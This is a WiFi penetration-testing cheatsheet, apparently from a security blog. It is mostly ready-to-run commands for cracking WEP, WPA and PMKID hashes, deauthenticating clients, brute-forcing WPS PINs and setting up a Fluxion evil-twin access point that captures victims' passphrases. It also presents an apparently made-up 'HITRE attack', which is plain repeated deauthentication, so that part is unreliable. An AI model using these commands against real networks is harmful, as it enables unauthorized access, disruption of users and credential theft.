Welcome to the ultimate WiFi penetration testing cheatsheet, an essential resource for every ethical hacker. This guide will walk you through the process of testing WEP, WPA, PMKID Attack, ARP Request Replay Attack, WPS PIN, HITRE attack, and the Evil Twin method. We’ll also introduce popular automated tools and provide useful links for further learning.
This cheatsheet was created with the assumption that the user has installed the Kali operating system and is competent in using Linux based tools. You will also need a wifi adapter capable of packet injection.
Here are some common network adapters that are capable of packet injection:
- Alfa AWUS036ACH
- TP-Link TL-WN722N
- Alfa AWUS036NHA
- Alfa AWUS036H
- NETGEAR A6210-100PES
WiFi Penetration Testing Overview
WiFi penetration testing is a critical component of network security, aiming to identify vulnerabilities in wireless networks and implement appropriate security measures. Our WiFi penetration testing cheatsheet covers various techniques and methodologies targeting WEP, WPA, WPA2, and WPA3 encryption standards.
Essential Tools for WiFi Penetration Testing
Here are some popular automated tools for WiFi penetration testing that will be invaluable for your WiFi penetration testing cheatsheet:
- Aircrack-ng Suite: https://www.aircrack-ng.org/
- Wireshark: https://www.wireshark.org/
- Reaver: https://github.com/t6x/reaver-wps-fork-t6x
- Wifite: https://github.com/derv82/wifite2
- Fluxion: https://github.com/FluxionNetwork/fluxion
- Fern WiFi Cracker: https://github.com/savio-code/fern-wifi-cracker
🔐 WEP Penetration Testing
Enable Monitor Mode
airmon-ng start wlan0
Capture Packets
airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
Crack WEP Key
aircrack-ng [OUTPUT.cap]
🔐 WPA Penetration Testing
Enable Monitor Mode
airmon-ng start wlan0
Capture WPA Handshake
airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
Deauthenticate a Client
aireplay-ng --deauth 5 -a [BSSID] -c [CLIENT] wlan0mon
Crack WPA Key
aircrack-ng [OUTPUT.cap] -w [WORDLIST]
🔐 PMKID Attack
Enable Monitor Mode
airmon-ng start wlan0
Capture PMKID
hcxdumptool -i wlan0mon --enable_status 3 --filterlist=[TARGETS] --filtermode=2 --outfile=[OUTPUT]
Convert to Hashcat Format
hcxpcaptool -z [HASHFILE] [OUTPUT]
Crack PMKID
hashcat -m 16800 [HASHFILE] [WORDLIST] --force
🔐 ARP Request Replay Attack
Enable Monitor Mode
airmon-ng start wlan0
Capture Packets
airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
Perform ARP Request Replay
aireplay-ng --arpreplay -b [BSSID] -h [CLIENT] wlan0mon
Crack WEP Key
aircrack-ng [OUTPUT.cap]
🔐 WPS PIN Attack
Enable Monitor Mode
airmon-ng start wlan0
Scan for WPS-enabled Networks
wash -i wlan0mon
Crack WPS PIN Using Reaver
reaver -i wlan0mon -b [BSSID] -c [CHANNEL] -vv -K 1
→ WPA passphrase will be obtained if WPS PIN is cracked.
🔐 HITRE Attack (Handshake, Interactive, and Timing Resource Exhaustion)
Enable Monitor Mode
airmon-ng start wlan0
Capture WPA Handshake
airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
Repeatedly Deauthenticate Clients
aireplay-ng --deauth [COUNT] -a [BSSID] wlan0mon
Crack WPA Key
aircrack-ng [OUTPUT.cap] -w [WORDLIST]
🔐 Evil Twin Attack (Fluxion)
Install Fluxion
git clone https://github.com/FluxionNetwork/fluxion
Run Fluxion
cd fluxion && ./fluxion.sh
Configure Evil Twin
- Select your language
- Choose “Evil Twin AP” attack
- Follow the instructions to set up a fake access point
Capture WPA Passphrase
Once the victim connects and enters the passphrase, it will be captured and displayed.
